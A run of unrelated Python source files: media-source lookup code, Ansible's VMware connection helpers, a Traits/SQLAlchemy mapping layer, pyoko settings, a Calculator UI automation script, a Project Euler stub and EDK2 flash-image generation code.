""" # put a lock on this because the process of generating all media urls will take a couple hours, and we don't # want all workers to do the work locked = False while not locked: if not _normalized_urls_out_of_date(db): return db.begin() # poll instead of block so that we can releae the transaction and see whether someone else has already # updated all of the media locked = get_session_lock(db, 'MediaWords::TM::Media::media_normalized_urls', 1, wait=False) if not locked: db.commit() log.info("sleeping for media_normalized_urls lock...") time.sleep(1) log.warning("updating media_normalized_urls ...") media = db.query("select * from media where normalized_url is null").hashes() i = 0 total = len(media) for medium in media: i += 1 normalized_url = normalize_url_lossy(medium['url']) if normalized_url is None: normalized_url = medium['url'] log.info("[%d/%d] adding %s (%s)" % (i, total, medium['name'], normalized_url)) db.update_by_id('media', medium['media_id'], {'normalized_url': normalized_url}) db.commit() def lookup_medium(db: DatabaseHandler, url: str, name: str) -> typing.Optional[dict]: """Lookup a media source by normalized url and then name. Uses normalize_url_lossy() to normalize urls. Returns the parent media for duplicate media sources and returns no media that are marked foreign_rss_links. This function queries the media.normalized_url field to find the matching urls. Because the normalization function is in python, we have to keep that denormalized_url field current from within python. This function is responsible for keeping the table up to date by filling the field for any media for which it is null. Arguments: db - db handle url - url to lookup name - name to lookup Returns: a media source dict or None """ _update_media_normalized_urls(db) nu = _normalize_url(url) lookup_query = """ select m.* from media m where m.normalized_url = %(a)s and foreign_rss_links = 'f' order by dup_media_id nulls last, media_id """ medium = db.query(lookup_query, {'a': nu}).hash() if medium is None: medium = db.query( "select m.* from media m where lower(m.name) = lower(%(a)s) and m.foreign_rss_links = false", {'a': name}).hash() if medium is None: return None if medium['dup_media_id'] is not None: media_cycle_lookup = dict() # type: dict while medium['dup_media_id'] is not None: if medium['media_id'] in media_cycle_lookup: raise McTopicMediaException('Cycle found in duplicate media path: ' + str(media_cycle_lookup.keys())) media_cycle_lookup[medium['media_id']] = True medium = db.query("select * from media where media_id = %(a)s", {'a': medium['dup_media_id']}).hash() if medium['foreign_rss_links']: raise McTopicMediaException('Parent duplicate media source %d has foreign_rss_links' % medium['media_id']) return medium def get_unique_medium_name(db: DatabaseHandler, names: list) -> str: """Return the first name in the names list that does not yet exist for a media source, or None.""" for name in names: name = name[0:MAX_NAME_LENGTH] name_exists = db.query("select 1 from media where lower(name) = lower(%(a)s)", {'a': name}).hash() if name_exists is None: return name raise McTopicMediaUniqueException("Unable to find unique name among names: " + str(names)) def get_unique_medium_url(db: DatabaseHandler, urls: list) -> str: """Return the first url in the list that does not yet exist for a media source, or None. If no unique urls are found, trying appending '#spider' to each of the urls. 
""" spidered_urls = [u + URL_SPIDERED_SUFFIX for u in urls] urls = urls + spidered_urls for url in urls: url = url[0:MAX_URL_LENGTH] url_exists = db.query("select 1 from media where url = %(a)s", {'a': url}).hash() if url_exists is None: return url raise McTopicMediaUniqueException("Unable to find unique url among urls: " + str(urls)) def get_spidered_tag(db: DatabaseHandler) -> dict: """Return the spidered:spidered tag dict.""" spidered_tag = db.query( """ select t.* from tags t join tag_sets ts using ( tag_sets_id ) where t.tag = %(a)s and ts.name = %(b)s """, {'a': SPIDERED_TAG_TAG, 'b': SPIDERED_TAG_SET}).hash() if spidered_tag is None: tag_set = db.find_or_create('tag_sets', {'name': SPIDERED_TAG_SET}) spidered_tag = db.find_or_create('tags', {'tag': SPIDERED_TAG_TAG, 'tag_sets_id': tag_set['tag_sets_id']}) return spidered_tag def guess_medium(db: DatabaseHandler, story_url: str) -> dict: """Guess the media source for a story with the given url. The guess is based on a normalized version of the host part of the url. The guess takes into account the duplicate media relationships included in the postgres database through the media.dup_media_id fields. If no appropriate media source exists, this function will create a new one and return it. """ (medium_url, medium_name) = generate_medium_url_and_name_from_url(story_url) medium = lookup_medium(db, medium_url, medium_name) if medium is not None: return medium normalized_medium_url = _normalize_url(medium_url) normalized_story_url = _normalize_url(story_url) all_urls = [normalized_medium_url, medium_url, normalized_story_url, story_url] # avoid conflicts with existing media names and urls that are missed # by the above query b/c of dups feeds or foreign_rss_links medium_name = get_unique_medium_name(db, [medium_name] + all_urls) medium_url = get_unique_medium_url(db, all_urls) # a race condition with another thread can cause this to fail sometimes, but after the medium in the # other process has been created, all should be fine for i in range(_GUESS_MEDIUM_RETRIES): medium_data = {'name': medium_name, 'url': medium_url, 'normalized_url': normalized_medium_url} medium = db.find_or_create('media', medium_data) if medium is not None: break else: time.sleep(1) if medium is None: raise McTopicMediaUniqueException( "Unable to find or create medium for %s / %s" % (medium_name, medium_url)) log.info("add medium: %s / %s / %d" % (medium_name, medium_url, medium['media_id'])) spidered_tag = get_spidered_tag(db) db.find_or_create('media_tags_map', {'media_id': medium['media_id'], 'tags_id': spidered_tag['tags_id']}) return medium
# -*- coding: utf-8 -*- # (c) 2015, Joseph Callen <jcallen () csc.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. try: import atexit import time import ssl # requests is required for exception handling of the ConnectionError import requests from pyVim import connect from pyVmomi import vim HAS_PYVMOMI = True except ImportError: HAS_PYVMOMI = False class TaskError(Exception): pass def wait_for_task(task): while True: if task.info.state == vim.TaskInfo.State.success: return True, task.info.result if task.info.state == vim.TaskInfo.State.error: try: raise TaskError(task.info.error) except AttributeError: raise TaskError("An unknown error has occurred") if task.info.state == vim.TaskInfo.State.running: time.sleep(15) if task.info.state == vim.TaskInfo.State.queued: time.sleep(15) def find_dvspg_by_name(dv_switch, portgroup_name): portgroups = dv_switch.portgroup for pg in portgroups: if pg.name == portgroup_name: return pg return None def find_entity_child_by_path(content, entityRootFolder, path): entity = entityRootFolder searchIndex = content.searchIndex paths = path.split("/") try: for path in paths: entity = searchIndex.FindChild (entity, path) if entity.name == paths[-1]: return entity except: pass return None # Maintain for legacy, or remove with 2.1 ? # Should be replaced with find_cluster_by_name def find_cluster_by_name_datacenter(datacenter, cluster_name): host_folder = datacenter.hostFolder for folder in host_folder.childEntity: if folder.name == cluster_name: return folder return None def find_cluster_by_name(content, cluster_name, datacenter=None): if datacenter: folder = datacenter.hostFolder else: folder = content.rootFolder clusters = get_all_objs(content, [vim.ClusterComputeResource], folder) for cluster in clusters: if cluster.name == cluster_name: return cluster return None def find_datacenter_by_name(content, datacenter_name): datacenters = get_all_objs(content, [vim.Datacenter]) for dc in datacenters: if dc.name == datacenter_name: return dc return None def find_dvs_by_name(content, switch_name): vmware_distributed_switches = get_all_objs(content, [vim.dvs.VmwareDistributedVirtualSwitch]) for dvs in vmware_distributed_switches: if dvs.name == switch_name: return dvs return None def find_hostsystem_by_name(content, hostname): host_system = get_all_objs(content, [vim.HostSystem]) for host in host_system: if host.name == hostname: return host return None def find_vm_by_id(content, vm_id, vm_id_type="vm_name", datacenter=None, cluster=None): """ UUID is unique to a VM, every other id returns the first match. 
""" si = content.searchIndex vm = None if vm_id_type == 'dns_name': vm = si.FindByDnsName(datacenter=datacenter, dnsName=vm_id, vmSearch=True) elif vm_id_type == 'inventory_path': vm = si.FindByInventoryPath(inventoryPath=vm_id) if type(vm) != type(vim.VirtualMachine): vm = None elif vm_id_type == 'uuid': vm = si.FindByUuid(datacenter=datacenter, instanceUuid=vm_id, vmSearch=True) elif vm_id_type == 'ip': vm = si.FindByIp(datacenter=datacenter, ip=vm_id, vmSearch=True) elif vm_id_type == 'vm_name': folder = None if cluster: folder = cluster elif datacenter: folder = datacenter.hostFolder vm = find_vm_by_name(content, vm_id, folder) return vm def find_vm_by_name(content, vm_name, folder=None, recurse=True): vms = get_all_objs(content, [vim.VirtualMachine], folder, recurse=True) for vm in vms: if vm.name == vm_name: return vm return None def find_host_portgroup_by_name(host, portgroup_name): for portgroup in host.config.network.portgroup: if portgroup.spec.name == portgroup_name: return portgroup return None def vmware_argument_spec(): return dict( hostname=dict(type='str', required=True), username=dict(type='str', aliases=['user', 'admin'], required=True), password=dict(type='str', aliases=['pass', 'pwd'], required=True, no_log=True), validate_certs=dict(type='bool', required=False, default=True), ) def connect_to_api(module, disconnect_atexit=True): hostname = module.params['hostname'] username = module.params['username'] password = module.params['password'] validate_certs = module.params['validate_certs'] if validate_certs and not hasattr(ssl, 'SSLContext'): module.fail_json(msg='pyVim does not support changing verification mode with python < 2.7.9. Either update python or or use validate_certs=false') try: service_instance = connect.SmartConnect(host=hostname, user=username, pwd=password) except vim.fault.InvalidLogin, invalid_login: module.fail_json(msg=invalid_login.msg, apierror=str(invalid_login)) except requests.ConnectionError, connection_error: if '[SSL: CERTIFICATE_VERIFY_FAILED]' in str(connection_error) and not validate_certs: context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.verify_mode = ssl.CERT_NONE service_instance = connect.SmartConnect(host=hostname, user=username, pwd=password, sslContext=context) else: module.fail_json(msg="Unable to connect to vCenter or ESXi API on TCP/443.", apierror=str(connection_error)) # Disabling atexit should be used in special cases only. # Such as IP change of the ESXi host which removes the connection anyway. # Also removal significantly speeds up the return of the module if disconnect_atexit: atexit.register(connect.Disconnect, service_instance) return service_instance.RetrieveContent() def get_all_objs(content, vimtype, folder=None, recurse=True): if not folder: folder = content.rootFolder obj = {} container = content.viewManager.CreateContainerView(folder, vimtype, recurse) for managed_object_ref in container.view: obj.update({managed_object_ref: managed_object_ref.name}) return obj
""" Utilities for mapping HasTraits classes to a relational database using SQLAlchemy. These tools are not declarative, like the Elixir extension. Rather, they just provide the low-level support for mapping an existing schema to traited classes. Your classes must subclass from HasDBTraits. Each mapped trait should have the "db_storage=True" metadata. Many of the traits have been subclassed here to provide this by default, e.g. DBInt, DBInstance, DBStr, etc. Many of these are also customized to accept None, too, in order to support SQL NULLs. The only collection trait supported is DBList. One cannot currently map Dict or Set traits. Instead of using sqlalchemy.orm.mapper() to declare mappers, use trait_mapper(). For 1:N and M:N relations that map to a DBList, use trait_list_relation() instead of sqlalchemy.orm.relation(). """ import weakref from sqlalchemy.orm import EXT_CONTINUE, MapperExtension, mapper, relation, session, reconstructor from sqlalchemy.orm.attributes import set_attribute from traits.api import (Any, Array, Either, Float, HasTraits, Instance, Int, List, Property, Python, Str, TraitListObject, on_trait_change) __all__ = ['MappedTraitListObject', 'DBList', 'DBAny', 'DBArray', 'DBFloat', 'DBInstance', 'DBInt', 'DBIntKey', 'DBStr', 'HasDBTraits', 'trait_list_relation', 'trait_mapper'] # A unique object to act as a dummy object for MappedTraitListObjects so we know # when they have been constructed outside of Traits. It needs to be a valid # HasTraits instance, but otherwise, nothing special. HAS_TRAITS_SENTINEL = HasTraits() class MappedTraitListObject(TraitListObject): """ TraitListObject decorated for SQLAlchemy relations. """ __emulates__ = list def __init__(self, *args, **kwds): if not args and not kwds: args = (DBList(), HAS_TRAITS_SENTINEL, '__fake', []) TraitListObject.__init__(self, *args, **kwds) # FIXME: Fix Traits so we don't need this hack. class WeirdInt(int): """ Work around a missing feature in Traits. Traits uses the default_value_type to determine if a trait is a List, Dict, etc. through a dict lookup for deciding if it is going to add the *_items events. List subclasses need to use a different default_value_type, though, so we'll pretend that we look like a list (default_value_type=5). The other place where Traits uses the default_value_type is in the C code, where it converts it to a C int, so it will get the real value of "8" there. Horrible, horrible hack. I am not proud. """ def __hash__(self): return hash(5) def __eq__(self, other): if other == 5: return True else: return int(self) == other class DBList(List): """ Subclass of List traits to use SQLAlchemy mapped lists. """ default_value_type = WeirdInt(8) def __init__(self, *args, **kwds): kwds['db_storage'] = True List.__init__(self, *args, **kwds) # Set up the Type-8 initializer. self.real_default_value = self.default_value def type8_init(obj): # Handle the conversion to a MappedTraitListObject in the validator. return self.real_default_value self.default_value = type8_init def validate(self, object, name, value): """ Validates that the values is a valid list. """ if (isinstance(value, list) and (self.minlen <= len(value) <= self.maxlen)): if object is None: return value if hasattr(object, '_state'): # Object has been mapped. attr = getattr(object.__class__, name) _, list_obj = attr.impl._build_collection(object._state) # Add back the Traits-specified information. list_obj.__init__(self, object, name, value) else: # Object has not been mapped, yet. 
list_obj = MappedTraitListObject(self, object, name, value) return list_obj self.error(object, name, value) class DBAny(Any): def __init__(self, *args, **kwds): kwds['db_storage'] = True super(DBAny, self).__init__(*args, **kwds) class DBInstance(Instance): def __init__(self, *args, **kwds): kwds['db_storage'] = True super(DBInstance, self).__init__(*args, **kwds) class DBArray(Array): def __init__(self, *args, **kwds): kwds['db_storage'] = True super(DBArray, self).__init__(*args, **kwds) class DBInt(Either): def __init__(self, **kwds): kwds['db_storage'] = True kwds['default'] = 0 super(DBInt, self).__init__(Int, None, **kwds) class DBIntKey(Either): def __init__(self, **kwds): kwds['db_storage'] = True super(DBIntKey, self).__init__(None, Int, **kwds) class DBUUID(Any): def __init__(self, *args, **kwds): kwds['db_storage'] = True super(DBUUID, self).__init__(*args, **kwds) class DBFloat(Either): def __init__(self, **kwds): kwds['db_storage'] = True kwds['default'] = 0.0 super(DBFloat, self).__init__(Float, None, **kwds) class DBStr(Either): def __init__(self, **kwds): kwds['db_storage'] = True kwds['default'] = '' super(DBStr, self).__init__(Str, None, **kwds) def _fix_dblist(object, value, trait_name, trait): """ Fix MappedTraitListObject values for DBList traits that do not have the appropriate metadata. No-op for non-DBList traits, so it may be used indiscriminantly. """ if isinstance(trait.handler, DBList): if value.object() is HAS_TRAITS_SENTINEL: value.object = weakref.ref(object) value.name = trait_name value.name_items = trait_name + '_items' value.trait = trait.handler class HasDBTraits(HasTraits): """ Base class providing the necessary connection to the SQLAlchemy mapper. """ @reconstructor def init_on_load(self): """ This will make sure that the HasTraits machinery is hooked up so that things like @on_trait_change() will work. """ super(HasDBTraits, self).__init__() # Check for bad DBList traits. for trait_name, trait in self.traits(db_storage=True).items(): value = self.trait_get(trait_name)[trait_name] _fix_dblist(self, value, trait_name, trait) # The SQLAlchemy Session this object belongs to. _session = Property() # Any implicit traits added by SQLAlchemy are transient and should not be # copied through .clone_traits(), copy.copy(), or pickling. _ = Python(transient=True) def _get__session(self): return session.object_session(self) @on_trait_change('+db_storage') def _tell_sqlalchemy(self, object, trait_name, old, new): """ If the trait being changed has db_storage metadata, set dirty flag. Returns ------- If self is linked to a SQLAlchemy session and the conditions have been met then the dirty flag on the SQLAlchemy metadata will be set. Description ----------- HasTrait bypasses the default class attribute getter and setter which in turn causes SQLAlchemy to fail to detect that a class has data to be flushed. As a work-around we must manually set the SQLAlchemy dirty flag when one of our db_storage traits has been changed. """ if hasattr(self, '_sa_instance_state'): trait = self.trait(trait_name) # Use the InstrumentedAttribute descriptor on this class inform # SQLAlchemy of the changes. instr = getattr(self.__class__, trait_name) # SQLAlchemy looks at the __dict__ for information. Fool it. self.__dict__[trait_name] = old _fix_dblist(self, new, trait_name, trait) instr.__set__(self, new) # The value may have been replaced. Fix it again. 
new = self.trait_get(trait_name)[trait_name] _fix_dblist(self, new, trait_name, trait) self.__dict__[trait_name] = new return def trait_list_relation(argument, secondary=None, collection_class=MappedTraitListObject, **kwargs): """ An eager relation mapped to a List trait. The arguments are the same as sqlalchemy.orm.relation(). """ kwargs['lazy'] = False return relation(argument, secondary=secondary, collection_class=collection_class, **kwargs) class TraitMapperExtension(MapperExtension): """ Create HasDBTraits instances correctly. """ def create_instance(self, mapper, selectcontext, row, class_): """ Create HasDBTraits instances correctly. This will make sure that the HasTraits machinery is hooked up so that things like @on_trait_change() will work. """ if issubclass(class_, HasTraits): obj = mapper.class_manager.new_instance(class_) HasTraits.__init__(obj) return obj else: return EXT_CONTINUE def populate_instance(self, mapper, selectcontext, row, instance, **flags): """ Receive a newly-created instance before that instance has its attributes populated. This will fix up any MappedTraitListObject values which were created without the appropriate metadata. """ if isinstance(instance, HasTraits): mapper.populate_instance(selectcontext, instance, row, **flags) # Check for bad DBList traits. for trait_name, trait in instance.traits(db_storage=True).items(): value = instance.trait_get(trait_name)[trait_name] _fix_dblist(instance, value, trait_name, trait) else: return EXT_CONTINUE
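# ---------------------------------------------------------------------------
# Hedged usage sketch: declaring a traited class whose db_storage traits can
# be mapped with trait_mapper()/trait_list_relation(). The class, its fields
# and the omitted table/mapper wiring are hypothetical.
# ---------------------------------------------------------------------------
class ExampleRecord(HasDBTraits):

    # Primary key column (None until the row is flushed).
    id = DBIntKey()

    # Simple scalar columns.
    label = DBStr()
    value = DBFloat()

    # 1:N relation target; wired up with trait_list_relation() on the owning
    # mapper (not shown here).
    children = DBList()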
# -*- coding: utf-8 -*-
# Copyright (C) 2015 ZetaOps Inc.
#
# This file is licensed under the GNU General Public License v3
# (GPLv3). See LICENSE.txt for details.
"""
Default Settings
"""
import os

DEFAULT_BUCKET_TYPE = os.environ.get('DEFAULT_BUCKET_TYPE', 'pyoko_models')

# write_once bucket doesn't support secondary indexes. Thus, backend is defined
# as "leveldb_mult" in log_version bucket properties.
VERSION_LOG_BUCKET_TYPE = os.environ.get('VERSION_LOG_BUCKET_TYPE', 'log_version')

RIAK_SERVER = os.environ.get('RIAK_SERVER', 'localhost')
RIAK_PROTOCOL = os.environ.get('RIAK_PROTOCOL', 'http')
RIAK_PORT = os.environ.get('RIAK_PORT', 8098)
RIAK_HTTP_PORT = os.environ.get('RIAK_HTTP_PORT', 8098)

#: Redis address and port.
REDIS_SERVER = os.environ.get('REDIS_SERVER', '127.0.0.1:6379')

#: Redis password (if any).
REDIS_PASSWORD = os.environ.get('REDIS_PASSWORD', None)

#: Set True to enable versioning on write-once buckets
ENABLE_VERSIONS = os.environ.get('ENABLE_VERSIONS', 'False') == 'True'

#: Suffix for version buckets
VERSION_SUFFIX = os.environ.get('VERSION_SUFFIX', '_version')

#: Set True to enable auto-logging of all DB operations to a
#: write-once log bucket
ENABLE_ACTIVITY_LOGGING = os.environ.get('ENABLE_ACTIVITY_LOGGING', 'False') == 'True'

#: Set the name of logging bucket type and bucket name.
ACTIVITY_LOGGING_BUCKET = os.environ.get('ACTIVITY_LOGGING_BUCKET', 'log')
VERSION_BUCKET = os.environ.get('VERSION_BUCKET', 'version')

#: Set True to enable caching all models to Redis
ENABLE_CACHING = os.environ.get('ENABLE_CACHING', 'False') == 'True'

#: Expiration time for cached models.
CACHE_EXPIRE_DURATION = os.environ.get('CACHE_EXPIRE_DURATION', 36000)
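# ---------------------------------------------------------------------------
# Hedged illustration: these settings are read from the environment at import
# time, so they are overridden before pyoko is imported, e.g.
#
#   export RIAK_SERVER=riak.internal ENABLE_VERSIONS=True
#
# or from Python (values are placeholders):
#
#   import os
#   os.environ.setdefault('DEFAULT_BUCKET_TYPE', 'my_models')
#   os.environ.setdefault('ENABLE_CACHING', 'True')
# ---------------------------------------------------------------------------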
# coding=utf-8
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver.common.keys import Keys
from random import randint
import time
import utilities

driver = utilities.startWebDriverSession('http://localhost:4622/wd/hub')
driver.get("Calculator")
driver.add_cookie({'name': 'mouse_speed', 'value': 40})


def clickElement(xPath):
    element = driver.find_element_by_xpath(xPath)
    ActionChains(driver).move_to_element(element).click().perform()

#AC
clickElement("/AXApplication[@AXTitle='Calculator']/AXWindow[@AXIdentifier='_NS:477' and @AXSubrole='AXStandardWindow']/AXGroup[@AXIdentifier='_NS:696']/AXButton[@AXIdentifier='_NS:752']")

#View Menu
clickElement("/AXApplication[@AXTitle='Calculator']/AXMenuBar[0]/AXMenuBarItem[@AXTitle='View']")

#Scientific Menu Item
clickElement("/AXApplication[@AXTitle='Calculator']/AXMenuBar[0]/AXMenuBarItem[@AXTitle='View']/AXMenu[0]/AXMenuItem[@AXTitle='Scientific']")

#Pi
clickElement("/AXApplication[@AXTitle='Calculator']/AXWindow[@AXIdentifier='_NS:477' and @AXSubrole='AXStandardWindow']/AXGroup[@AXIdentifier='_NS:145']/AXButton[@AXIdentifier='_NS:317']")

#x3
clickElement("/AXApplication[@AXTitle='Calculator']/AXWindow[@AXIdentifier='_NS:477' and @AXSubrole='AXStandardWindow']/AXGroup[@AXIdentifier='_NS:145']/AXButton[@AXIdentifier='_NS:252']")

#ex
clickElement("/AXApplication[@AXTitle='Calculator']/AXWindow[@AXIdentifier='_NS:477' and @AXSubrole='AXStandardWindow']/AXGroup[@AXIdentifier='_NS:145']/AXButton[@AXTitle='e to the x' and @AXIdentifier='_NS:416']")

#10x
clickElement("/AXApplication[@AXTitle='Calculator']/AXWindow[@AXIdentifier='_NS:477' and @AXSubrole='AXStandardWindow']/AXGroup[@AXIdentifier='_NS:145']/AXButton[@AXTitle='ten to the x' and @AXIdentifier='_NS:361']")

time.sleep(3)

#closeButton
clickElement("/AXApplication[@AXTitle='Calculator']/AXWindow[@AXIdentifier='_NS:477' and @AXSubrole='AXStandardWindow']/AXButton[@AXSubrole='AXCloseButton']")
# -*- coding: utf-8 -*-
# ProjectEuler/src/python/problem075.py
#
# Singular integer right triangles
# ================================
# Published on Friday, 30th July 2004, 06:00 pm
#
# It turns out that 12 cm is the smallest length of wire that can be bent to
# form an integer sided right angle triangle in exactly one way, but there are
# many more examples.
#
#     12 cm: (3,4,5)    24 cm: (6,8,10)    30 cm: (5,12,13)
#     36 cm: (9,12,15)  40 cm: (8,15,17)   48 cm: (12,16,20)
#
# In contrast, some lengths of wire, like 20 cm, cannot be bent to form an
# integer sided right angle triangle, and other lengths allow more than one
# solution to be found; for example, using 120 cm it is possible to form
# exactly three different integer sided right angle triangles.
#
#     120 cm: (30,40,50), (20,48,52), (24,45,51)
#
# Given that L is the length of the wire, for how many values of L <= 1,500,000
# can exactly one integer sided right angle triangle be formed?

import projecteuler as pe


def main():
    pass


if __name__ == "__main__":
    main()
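# ---------------------------------------------------------------------------
# Hedged solution sketch (main() above is left as a stub): one standard
# approach enumerates primitive Pythagorean triples with Euclid's formula and
# counts perimeter multiples up to the limit.
# ---------------------------------------------------------------------------
def _gcd(a, b):
    # Greatest common divisor; avoids relying on math.gcd vs fractions.gcd.
    while b:
        a, b = b, a % b
    return a


def count_singular_lengths(limit=1500000):
    # counts[p] = number of integer right triangles with perimeter p.
    counts = [0] * (limit + 1)
    m = 2
    # For a given m, the smallest primitive perimeter is 2*m*(m+1) (at n = 1).
    while 2 * m * (m + 1) <= limit:
        for n in range(1, m):
            # Primitive triple condition: m, n coprime and of opposite parity.
            if (m - n) % 2 == 1 and _gcd(m, n) == 1:
                perimeter = 2 * m * (m + n)  # a + b + c = 2m(m + n)
                for p in range(perimeter, limit + 1, perimeter):
                    counts[p] += 1
        m += 1
    return sum(1 for c in counts if c == 1)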
## @file # process FD generation # # Copyright (c) 2007, Intel Corporation. All rights reserved.<BR> # # This program and the accompanying materials # are licensed and made available under the terms and conditions of the BSD License # which accompanies this distribution. The full text of the license may be found at # http://opensource.org/licenses/bsd-license.php # # THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS, # WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED. # ## # Import Modules # import Region import Fv import os import StringIO import sys from struct import * from GenFdsGlobalVariable import GenFdsGlobalVariable from CommonDataClass.FdfClass import FDClassObject from Common import EdkLogger from Common.BuildToolError import * from Common.Misc import SaveFileOnChange from GenFds import GenFds ## generate FD # # class FD(FDClassObject): ## The constructor # # @param self The object pointer # def __init__(self): FDClassObject.__init__(self) ## GenFd() method # # Generate FD # # @retval string Generated FD file name # def GenFd (self): if self.FdUiName.upper() + 'fd' in GenFds.ImageBinDict.keys(): return GenFds.ImageBinDict[self.FdUiName.upper() + 'fd'] # # Print Information # GenFdsGlobalVariable.InfLogger("Fd File Name:%s" %self.FdUiName) Offset = 0x00 for item in self.BlockSizeList: Offset = Offset + item[0] * item[1] if Offset != self.Size: EdkLogger.error("GenFds", GENFDS_ERROR, 'FD %s Size not consistent with block array' % self.FdUiName) GenFdsGlobalVariable.VerboseLogger('Following Fv will be add to Fd !!!') for FvObj in GenFdsGlobalVariable.FdfParser.Profile.FvDict: GenFdsGlobalVariable.VerboseLogger(FvObj) GenFdsGlobalVariable.VerboseLogger('################### Gen VTF ####################') self.GenVtfFile() TempFdBuffer = StringIO.StringIO('') PreviousRegionStart = -1 PreviousRegionSize = 1 for RegionObj in self.RegionList : if RegionObj.RegionType == 'CAPSULE': continue if RegionObj.Offset + RegionObj.Size <= PreviousRegionStart: pass elif RegionObj.Offset <= PreviousRegionStart or (RegionObj.Offset >=PreviousRegionStart and RegionObj.Offset < PreviousRegionStart + PreviousRegionSize): pass elif RegionObj.Offset > PreviousRegionStart + PreviousRegionSize: GenFdsGlobalVariable.InfLogger('Padding region starting from offset 0x%X, with size 0x%X' %(PreviousRegionStart + PreviousRegionSize, RegionObj.Offset - (PreviousRegionStart + PreviousRegionSize))) PadRegion = Region.Region() PadRegion.Offset = PreviousRegionStart + PreviousRegionSize PadRegion.Size = RegionObj.Offset - PadRegion.Offset PadRegion.AddToBuffer(TempFdBuffer, self.BaseAddress, self.BlockSizeList, self.ErasePolarity, GenFds.ImageBinDict, self.vtfRawDict, self.DefineVarDict) PreviousRegionStart = RegionObj.Offset PreviousRegionSize = RegionObj.Size # # Call each region's AddToBuffer function # if PreviousRegionSize > self.Size: pass GenFdsGlobalVariable.VerboseLogger('Call each region\'s AddToBuffer function') RegionObj.AddToBuffer (TempFdBuffer, self.BaseAddress, self.BlockSizeList, self.ErasePolarity, GenFds.ImageBinDict, self.vtfRawDict, self.DefineVarDict) FdBuffer = StringIO.StringIO('') PreviousRegionStart = -1 PreviousRegionSize = 1 for RegionObj in self.RegionList : if RegionObj.Offset + RegionObj.Size <= PreviousRegionStart: EdkLogger.error("GenFds", GENFDS_ERROR, 'Region offset 0x%X in wrong order with Region starting from 0x%X, size 0x%X\nRegions in FDF must have offsets appear in ascending order.'\ % (RegionObj.Offset, PreviousRegionStart, 
PreviousRegionSize)) elif RegionObj.Offset <= PreviousRegionStart or (RegionObj.Offset >=PreviousRegionStart and RegionObj.Offset < PreviousRegionStart + PreviousRegionSize): EdkLogger.error("GenFds", GENFDS_ERROR, 'Region offset 0x%X overlaps with Region starting from 0x%X, size 0x%X' \ % (RegionObj.Offset, PreviousRegionStart, PreviousRegionSize)) elif RegionObj.Offset > PreviousRegionStart + PreviousRegionSize: GenFdsGlobalVariable.InfLogger('Padding region starting from offset 0x%X, with size 0x%X' %(PreviousRegionStart + PreviousRegionSize, RegionObj.Offset - (PreviousRegionStart + PreviousRegionSize))) PadRegion = Region.Region() PadRegion.Offset = PreviousRegionStart + PreviousRegionSize PadRegion.Size = RegionObj.Offset - PadRegion.Offset PadRegion.AddToBuffer(FdBuffer, self.BaseAddress, self.BlockSizeList, self.ErasePolarity, GenFds.ImageBinDict, self.vtfRawDict, self.DefineVarDict) PreviousRegionStart = RegionObj.Offset PreviousRegionSize = RegionObj.Size # # Verify current region fits within allocated FD section Size # if PreviousRegionStart + PreviousRegionSize > self.Size: EdkLogger.error("GenFds", GENFDS_ERROR, 'FD %s size too small to fit region with offset 0x%X and size 0x%X' % (self.FdUiName, PreviousRegionStart, PreviousRegionSize)) # # Call each region's AddToBuffer function # GenFdsGlobalVariable.VerboseLogger('Call each region\'s AddToBuffer function') RegionObj.AddToBuffer (FdBuffer, self.BaseAddress, self.BlockSizeList, self.ErasePolarity, GenFds.ImageBinDict, self.vtfRawDict, self.DefineVarDict) # # Create a empty Fd file # GenFdsGlobalVariable.VerboseLogger ('Create an empty Fd file') FdFileName = os.path.join(GenFdsGlobalVariable.FvDir,self.FdUiName + '.fd') # # Write the buffer contents to Fd file # GenFdsGlobalVariable.VerboseLogger('Write the buffer contents to Fd file') SaveFileOnChange(FdFileName, FdBuffer.getvalue()) FdBuffer.close(); GenFds.ImageBinDict[self.FdUiName.upper() + 'fd'] = FdFileName return FdFileName ## generate VTF # # @param self The object pointer # def GenVtfFile (self) : # # Get this Fd's all Fv name # FvAddDict ={} FvList = [] for RegionObj in self.RegionList: if RegionObj.RegionType == 'FV': if len(RegionObj.RegionDataList) == 1: RegionData = RegionObj.RegionDataList[0] FvList.append(RegionData.upper()) FvAddDict[RegionData.upper()] = (int(self.BaseAddress,16) + \ RegionObj.Offset, RegionObj.Size) else: Offset = RegionObj.Offset for RegionData in RegionObj.RegionDataList: FvList.append(RegionData.upper()) FvObj = GenFdsGlobalVariable.FdfParser.Profile.FvDict.get(RegionData.upper()) if len(FvObj.BlockSizeList) < 1: EdkLogger.error("GenFds", GENFDS_ERROR, 'FV.%s must point out FVs blocksize and Fv BlockNum' \ % FvObj.UiFvName) else: Size = 0 for blockStatement in FvObj.BlockSizeList: Size = Size + blockStatement[0] * blockStatement[1] FvAddDict[RegionData.upper()] = (int(self.BaseAddress,16) + \ Offset, Size) Offset = Offset + Size # # Check whether this Fd need VTF # Flag = False for VtfObj in GenFdsGlobalVariable.FdfParser.Profile.VtfList: compLocList = VtfObj.GetFvList() if set(compLocList).issubset(FvList): Flag = True break if Flag == True: self.vtfRawDict = VtfObj.GenVtf(FvAddDict) ## generate flash map file # # @param self The object pointer # def GenFlashMap (self): pass
